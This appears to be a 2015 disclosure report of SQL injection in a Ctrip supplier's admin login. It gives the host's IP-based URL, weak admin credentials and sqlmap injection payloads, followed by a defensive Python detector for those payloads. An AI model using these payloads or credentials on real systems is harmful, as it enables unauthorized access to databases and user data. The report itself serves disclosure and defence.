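2015-12-20: Details have been reported to the vendor; awaiting vendor handling
2015-12-21: The vendor has actively ignored the vulnerability; details are disclosed to the public
From the admin backend it is possible to learn Ctrip's low-price policy, users' itinerary search requests, and other information...
URL: http://121.201.34.104/admin/login.php (parameter: account), DBA privileges:
Weak passwords: admin / admin && ctrip / ctrip
Payload: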
Parameter: account (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: done=&account=admin' RLIKE (SELECT (CASE WHEN (3661=3661) THEN 0x61646d696e ELSE 0x28 END)) AND 'XSWF'='XSWF&password=aaaaaa&Submit=%E7%A1%AE%E8%AE%A4
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: done=&account=admin' AND (SELECT 9467 FROM(SELECT COUNT(*),CONCAT(0x7176717171,(SELECT (ELT(9467=9467,1))),0x71766b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'sMbe'='sMbe&password=aaaaaa&Submit=%E7%A1%AE%E8%AE%A4
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: done=&account=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))uOwx) AND 'XHgB'='XHgB&password=aaaaaa&Submit=%E7%A1%AE%E8%AE%A4
    Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Strengthen passwords && filter input
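Added example, not part of the original report: a Python triage helper that flags the three sqlmap techniques listed above when they appear in a form-encoded POST body. The function name `classify`, the signature patterns and the benign sample are assumptions made for illustration; the three payload samples are copied from the sqlmap output above.

```python
import re
from urllib.parse import parse_qsl

# One signature per sqlmap technique named in the report (patterns are assumptions).
SIGNATURES = {
    "boolean-based blind": re.compile(
        r"\bRLIKE\s*\(\s*SELECT\s*\(\s*CASE\s+WHEN\b", re.I),
    "error-based": re.compile(
        r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\).*?\bGROUP\s+BY\b",
        re.I | re.S),
    "time-based blind": re.compile(r"\bSLEEP\s*\(\s*\d+", re.I),
}

def classify(body):
    """Map each POST field to the techniques its decoded value matches."""
    hits = {}
    # parse_qsl splits on '&', splits each pair on the first '=' and
    # percent-decodes every value before the signatures are applied.
    for field, value in parse_qsl(body, keep_blank_values=True):
        found = [name for name, rx in SIGNATURES.items() if rx.search(value)]
        if found:
            hits.setdefault(field, []).extend(found)
    return hits

TAIL = "&password=aaaaaa&Submit=%E7%A1%AE%E8%AE%A4"
SAMPLES = {
    # The first three bodies are the payloads from the report's sqlmap output.
    "boolean": "done=&account=admin' RLIKE (SELECT (CASE WHEN (3661=3661) "
               "THEN 0x61646d696e ELSE 0x28 END)) AND 'XSWF'='XSWF" + TAIL,
    "error": "done=&account=admin' AND (SELECT 9467 FROM(SELECT COUNT(*),"
             "CONCAT(0x7176717171,(SELECT (ELT(9467=9467,1))),0x71766b6271,"
             "FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS "
             "GROUP BY x)a) AND 'sMbe'='sMbe" + TAIL,
    "time": "done=&account=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))uOwx) "
            "AND 'XHgB'='XHgB" + TAIL,
    # Constructed benign login for comparison.
    "benign": "done=&account=admin" + TAIL,
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(label, classify(body))
```

Signature matching of this kind serves request-log review and alerting; it does not replace binding `account` as a query parameter in the login handler.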
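Severity: no impact, ignored by vendor
Ignored at: 2015-12-21 13:49
Thank you for submitting this vulnerability information. This vulnerability is a third-party supplier's issue and does not read Ctrip's own database; it has been ignored.
None yet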